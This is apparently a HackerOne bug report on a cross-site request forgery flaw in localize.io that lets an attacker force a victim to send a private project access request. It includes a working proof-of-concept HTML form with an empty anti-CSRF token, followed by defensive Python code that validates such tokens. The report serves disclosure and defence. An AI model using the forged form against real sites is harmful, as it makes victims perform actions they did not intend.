Localize: Private Project Access Request Invitation Sent Via CSRF

2014-04-20T18:02:43
ID H1:8226
Type hackerone
Reporter ajaysinghnegi
Modified 2014-04-21T02:49:03

Description

Hi Team,

I have found a CSRF vulnerability using which the attacker can force the victim to send a Private Project Access Invitation Request via CSRF; the anti-CSRF token is not getting validated on the server-side.

Private Project Access Request Invitation Sent Via CSRF Code:

<html>
  <body>
    <form action="http://www.localize.io/" method="POST">
      <input type="hidden" name="CSRFToken" value="" />
      <input type="hidden" name="requestInvitation[repositoryID]" value="9p" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
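The proof of concept above submits an empty CSRFToken and the request is still processed, which is what "not validated on the server-side" means in practice. As an added illustration (not Localize's code, and not part of the report), the following is a minimal synchronizer-token check of the kind that would have rejected that form: the token stored in the user's session must be present and must match the submitted CSRFToken field. The session and form dictionaries, and the handle_request_invitation function, are constructed stand-ins for the real framework objects and endpoint.

```python
import hmac
import secrets

# Constructed example of server-side CSRF validation. It is not the
# localize.io implementation; session/form are plain dicts standing in
# for the framework's session store and parsed POST body.


def issue_csrf_token(session):
    """Generate a fresh per-session token, store it, and return it.

    The server embeds this value in its own forms as CSRFToken; an
    attacker's cross-site page cannot read it, so it cannot reproduce it.
    """
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def validate_csrf(session, form):
    """Return True only when the submitted CSRFToken matches the session's.

    Rejects an empty or missing submitted token (the report's PoC case),
    a session that never received a token, and any mismatch. The
    comparison is constant-time to avoid leaking the token via timing.
    """
    expected = session.get("csrf_token")
    submitted = form.get("CSRFToken", "")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_request_invitation(session, form):
    """Stand-in for the requestInvitation endpoint: act only after the check.

    Returns an (http_status, message) tuple so the outcome can be inspected.
    """
    if not validate_csrf(session, form):
        return 403, "CSRF token missing or invalid"
    repo = form.get("requestInvitation[repositoryID]", "")
    return 200, f"invitation request sent for repository {repo}"


if __name__ == "__main__":
    sess = {}
    tok = issue_csrf_token(sess)
    # The PoC form from the report: empty token, must be rejected.
    print(handle_request_invitation(sess, {"CSRFToken": "", "requestInvitation[repositoryID]": "9p"}))
    # The site's own form carrying the session token: accepted.
    print(handle_request_invitation(sess, {"CSRFToken": tok, "requestInvitation[repositoryID]": "9p"}))
```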